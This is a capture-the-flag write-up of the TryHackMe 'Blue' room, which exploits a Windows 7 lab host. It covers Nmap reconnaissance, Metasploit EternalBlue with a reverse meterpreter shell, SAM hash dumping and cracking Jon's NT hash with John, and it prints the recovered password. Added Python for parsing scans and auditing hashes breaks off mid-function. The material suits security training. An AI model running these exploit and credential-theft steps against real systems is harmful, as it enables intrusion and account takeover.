Room link [TryHackMe]
Reconnaissance
The first phase of hacking involves gathering information about a target to identify the technologies it uses, which can lead an attacker to loopholes in the target (vulnerabilities or misconfigurations).
Following the plan step by step leads to a successful exploit.
Nmap Scan on the Target
nmap -sC -sV -v3 -p- -Pn -oN nmap-scan.txt <ip>
- -sC: Run the default NSE scripts.
- -sV: Version scan.
- -v3: Verbosity level; controls how much detail is shown in the output during a scan.
- -p-: Scan all ports of the target.
- -Pn: Skip host discovery and treat all specified hosts as "online" without attempting to ping them first.
- -oN: Write the output to a file.
- --script vuln: Runs vulnerability detection scripts from the Nmap Scripting Engine (NSE). It automates the detection of common vulnerabilities and provides detailed information about potential issues on the target system(s).
Found Some ports
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49160/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Found a vulnerability: ms17-010, which is EternalBlue.
- Every vulnerability has its own story. When someone discovers a zero-day vulnerability, there are often multiple reasons behind how and why they found it. Some may stumble upon it through rigorous research, while others might uncover it by accident. But what truly matters is understanding the vulnerability before attempting to exploit it.
- Taking the time to study a vulnerability can reveal fascinating histories, some even as impactful as EternalBlue, which played a critical role in global cyberattacks. By delving deeper, you not only enhance your ability to exploit or mitigate it effectively but also gain insights into the broader implications of cybersecurity threats.
- Check out the fascinating story behind the EternalBlue [wiki]
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
|_ <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
To gain access we can use Metasploit.
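As an added example (not part of the room write-up or of Nmap itself), the following Python parses normal-format Nmap output like the scan above into open ports and NSE script blocks, and pulls out any vuln script that reported State: VULNERABLE together with its CVE ids and risk factor. SAMPLE_SCAN is constructed from the output shown above; the dataclass names and the rule used to delimit script blocks are the example's own.

```python
"""Parse Nmap normal-format (-oN) output into ports and NSE script findings.

Added example for this write-up, not part of the TryHackMe room or of Nmap.
SAMPLE_SCAN is constructed from the scan output shown above, trimmed to the
lines that matter for parsing.
"""
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|
|     Disclosure date: 2017-03-14
|     References:
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^([A-Za-z0-9][\w.-]*):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    reason: str
    version: str


@dataclass
class ScriptResult:
    name: str
    summary: str                               # text after "name:" on the first line
    lines: list = field(default_factory=list)  # continuation lines without the "|" gutter


@dataclass
class ScanReport:
    ports: list = field(default_factory=list)
    scripts: list = field(default_factory=list)


def parse_nmap_normal(text: str) -> ScanReport:
    """Walk the report line by line. NSE lines start with "|"; a new script
    block begins on the first "|" line after a non-"|" line, or after a "|_"
    line, which closes the previous block."""
    report = ScanReport()
    current = None
    prev_was_pipe, prev_closed = False, True
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("|"):
            closes = line.startswith("|_")
            body = (line[2:] if closes else line[1:]).strip()
            m = SCRIPT_RE.match(body) if (not prev_was_pipe or prev_closed) else None
            if m:
                current = ScriptResult(name=m.group(1), summary=m.group(2))
                report.scripts.append(current)
            elif current is not None:
                current.lines.append(body)
            prev_was_pipe, prev_closed = True, closes
            continue
        prev_was_pipe = False
        m = PORT_RE.match(line)
        if m:
            number, proto, state, service, reason, version = m.groups()
            report.ports.append(Port(int(number), proto, state, service, reason, version.strip()))
    return report


def vulnerable_findings(report: ScanReport) -> list:
    """Return NSE vuln scripts that reported State: VULNERABLE, with CVE ids and risk."""
    findings = []
    for s in report.scripts:
        text = "\n".join([s.summary] + s.lines)
        if not re.search(r"State:\s*VULNERABLE", text):
            continue
        risk = re.search(r"Risk factor:\s*(\w+)", text)
        findings.append({"script": s.name,
                         "cves": sorted(set(CVE_RE.findall(text))),
                         "risk": risk.group(1) if risk else "UNKNOWN"})
    return findings


def open_ports(report: ScanReport) -> list:
    return [p.number for p in report.ports if p.state == "open"]


if __name__ == "__main__":
    rep = parse_nmap_normal(SAMPLE_SCAN)
    print("open ports:", open_ports(rep))
    for f in vulnerable_findings(rep):
        print(f"{f['script']}: {', '.join(f['cves'])} (risk {f['risk']})")
```

Running an nmap-scan.txt file through something like this turns a scan into records an inventory or ticketing system can consume; the same parse tells a defender that SMB on a Windows 7 host is exposed and flagged by smb-vuln-ms17-010, which is the finding that should drive patching or isolation.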
Foothold
Run msfconsole to start Metasploit.
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $msfconsole
Metasploit tip: The use command supports fuzzy searching to try and
select the intended module, e.g. use kerberos/get_ticket or use
kerberos forge silver ticket
=[ metasploit v6.4.43-dev ]
+ -- --=[ 2484 exploits - 1279 auxiliary - 431 post ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
[msf](Jobs:0 Agents:0) >>
Search for the exploit with search ms17-010.
[msf](Jobs:0 Agents:0) >> search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
To use the exploit, run the following command:
[msf](Jobs:0 Agents:0) >> use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
Run options to check the module's requirements.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.x.x.x yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Run set rhosts <target-ip> to set the target IP.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts <target-ip>
rhosts => <target-ip>
- Optional parameter
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
Run set lhost <attacker-ip> to set the attacker IP.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost <attacker-ip>
lhost => <attacker-ip>
Use check to verify that the target is vulnerable.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> check
[*] 10.x.x.x:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.x.x.x:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.x.x.x:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.x.x.x:445 - The target is vulnerable.
- Yes, the target is vulnerable.
Run exploit to launch the exploit.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> exploit
[*] Started reverse TCP handler on 10.x.x.x:4444
[*] 10.x.x.x:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.x.x.x:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.x.x.x:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.x.x.x:445 - The target is vulnerable.
[*] 10.x.x.x:445 - Connecting to target for exploitation.
[+] 10.x.x.x:445 - Connection established for exploitation.
[+] 10.x.x.x:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.x.x.x:445 - CORE raw buffer dump (42 bytes)
[*] 10.x.x.x:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.x.x.x:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.x.x.x:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.x.x.x:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.x.x.x:445 - Trying exploit with 12 Groom Allocations.
[*] 10.x.x.x:445 - Sending all but last fragment of exploit packet
[*] 10.x.x.x:445 - Starting non-paged pool grooming
[+] 10.x.x.x:445 - Sending SMBv2 buffers
[+] 10.x.x.x:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.x.x.x:445 - Sending final SMBv2 buffers.
[*] 10.x.x.x:445 - Sending last fragment of exploit packet!
[*] 10.x.x.x:445 - Receiving response from exploit packet
[+] 10.x.x.x:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.x.x.x:445 - Sending egg to corrupted connection.
[*] 10.x.x.x:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.x.x.x
[*] Meterpreter session 1 opened (10.x.x.x:4444 -> 10.x.x.x:49177) at 2025-01-25 13:53:56 +0530
[+] 10.x.x.x:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.x.x.x:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.x.x.x:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(Meterpreter 1)(C:\Windows\system32) >
- Upgrading the shell to a Meterpreter shell
- Press Ctrl+Z and answer y to background the session; this does not terminate the session.
(Meterpreter 1)(C:\Windows\system32) >
Background session 1? [y/N]
[msf](Jobs:0 Agents:1) exploit(windows/smb/ms17_010_eternalblue) >> search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter . normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
[msf](Jobs:0 Agents:1) exploit(windows/smb/ms17_010_eternalblue) >> use post/multi/manage/shell_to_meterpreter
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.x.x.x:4444 -> 10.x.x.x:49177 (10.x.x.x)
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION 1 yes The session to run this module on
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.x.x.x:4433
[*] Post module execution completed
[msf](Jobs:1 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[*] Sending stage (203846 bytes) to 10.x.x.x
[*] Meterpreter session 2 opened (10.x.x.x:4433 -> 10.x.x.x:49195) at 2025-01-25 14:02:07 +0530
[*] Stopping exploit/multi/handler
Interrupt: use the 'exit' command to quit
[msf](Jobs:0 Agents:2) post(multi/manage/shell_to_meterpreter) >> sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.x.x.x:4444 -> 10.x.x.x:49177 (10.x.x.x)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.x.x.x:4433 -> 10.x.x.x:49195 (10.x.x.x)
[msf](Jobs:0 Agents:2) post(multi/manage/shell_to_meterpreter) >> sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(C:\Windows\system32) >
Learning about Meterpreter shell commands
(Meterpreter 2)(C:\) > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias for lpwd)
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
For more info on a specific command, use <command> -h or help <command>.
(Meterpreter 2)(C:\) >
Searching for all text files
Run search -h to see the options:
(Meterpreter 2)(C:\) > search -h
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.
OPTIONS:
-a Find files modified after timestamp (UTC). Format: YYYY-mm-dd or YYYY-mm-ddTHH:MM:SS
-b Find files modified before timestamp (UTC). Format: YYYY-mm-dd or YYYY-mm-ddTHH:MM:SS
-d The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner
-r Recursively search sub directories. (Default: true)
- Listing all file paths to find the flags
(Meterpreter 2)(C:\) > search -f *.txt
Found 432 results...
====================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceAmharic.txt 16212 2009-06-11 03:13:18 +0530
.
.
c:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceYi.txt 44968 2009-06-11 03:13:19 +0530
c:\Program Files\Amazon\Ec2ConfigService\Docs\Attribution.txt 22520 2015-03-27 19:03:58 +0530
.
. 624 2015-03-27 19:04:10 +0530
.
.
. 0 2018-12-13 08:44:01 +0530
c:\Users\Jon\Documents\flag3.txt 37 2019-03-18 00:56:36 +0530
.
.
.
.
. 128975 2019-03-18 03:55:45 +0530
c:\Windows\System32\config\flag2.txt 34 2019-03-18 01:02:48 +0530
.
.
.
.
c:\flag1.txt 24 2019-03-18 00:57:21 +0530
(Meterpreter 2)(C:\) >
(Meterpreter 2)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Understand the Format
A typical hash dump entry looks like this:
<username>:<user_id>:<LM_hash>:<NT_hash>:::
- <username>: User account name (Jon)
- <user_id>: Security Identifier (SID) associated with the user (1000)
- <LM_hash>: LM hash (rarely used anymore, often just aad3b435b51404eeaad3b435b51404ee)
- <NT_hash>: The NTLM hash of the user's password
Validate the NT Hash
Ensure the hashes are in a valid format:
- Each NT hash is a 32-character hexadecimal string.
- Example: ffb43f0de35be4d9917ac0cc8ad57f8d
Crack the NT Hashes
You can now use the extracted NT hashes for further testing or cracking.
Using Hashcat:
- Save the NT hashes to a file (nt_hashes.txt).
- Use hashcat with mode 1000 (NTLM):
hashcat -m 1000 -a 0 nt_hashes.txt wordlist.txt
Using John the Ripper:
- Convert the hashes to a format John can understand if needed.
- After running John I got an error with the hash type:
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $ls
jon-hash nmap-scan nmap-scan-below-1000-ports nt-jon-hash
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $cat nt-jon-hash
Jon:ffb43f0de35be4d9917ac0cc8ad57f8d
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt nt-jon-hash
Warning: detected hash type "LM", but the string is also recognized as "dynamic=md5($p)"
Use the "--format=dynamic=md5($p)" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "HAVAL-128-4"
Use the "--format=HAVAL-128-4" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "MD2"
Use the "--format=MD2" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "mdc2"
Use the "--format=mdc2" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "mscash"
Use the "--format=mscash" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "mscash2"
Use the "--format=mscash2" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-MD4"
Use the "--format=Raw-MD4" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-MD5"
Use the "--format=Raw-MD5" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-MD5u"
Use the "--format=Raw-MD5u" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "ripemd-128"
Use the "--format=ripemd-128" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Snefru-128"
Use the "--format=Snefru-128" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "ZipMonster"
Use the "--format=ZipMonster" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2025-01-25 14:47) 0g/s 7192Kp/s 7192Kc/s 14385KC/s !!1QWER..*7¡VA
Session completed.
- So I specified the format of the hash with --format=nt:
john --wordlist=/usr/share/wordlists/rockyou.txt nt-jon-hash --format=nt
- Output:
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt nt-jon-hash --format=nt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (Jon)
1g 0:00:00:00 DONE (2025-01-25 14:48) 1.754g/s 17895Kp/s 17895Kc/s 17895KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Found credentials: Jon : alqfna22
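To make the hash format and the cracking step above concrete, here is an added example (not code from this write-up, the room, Metasploit, hashcat or John) that parses the hashdump lines shown earlier, flags accounts carrying the empty-password NT hash or a stored LM hash, and looks each NT hash up in a table built from a constructed banned-word list. It relies on the same property hashcat and John exploit at scale: the NT hash is unsalted MD4 over the UTF-16LE password. The MD4 routine, SAMPLE_DUMP and BANNED_WORDS are the example's own.

```python
"""Audit a hashdump listing: validate the user:id:lm:nt::: format, flag empty
passwords and stored LM hashes, and check NT hashes against a banned-word list.

Added example for this write-up; not part of the TryHackMe room, Metasploit,
hashcat or John. NT hashes are unsalted MD4 over the UTF-16LE password; the
small pure-Python MD4 below keeps the block independent of OpenSSL's legacy
provider. SAMPLE_DUMP is the hashdump output shown above; BANNED_WORDS is a
constructed stand-in for a wordlist such as rockyou.txt.
"""
import re
import struct

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""
BANNED_WORDS = ["password", "Password1", "123456", "welcome1", "alqfna22"]  # constructed list

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM value when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320). One unsalted MD4 per candidate is all an NT hash costs."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
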